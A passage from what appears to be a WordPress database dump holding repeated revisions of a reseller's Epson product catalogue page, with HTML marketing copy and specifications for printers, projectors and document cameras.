technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:02:38','2019-09-25 09:02:38','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3457,1,'2019-09-25 17:03:17','2019-09-25 09:03:17','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h3>LASER PRINTER</h3>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:03:17','2019-09-25 09:03:17','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3458,1,'2019-09-25 17:04:21','2019-09-25 09:04:21','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson 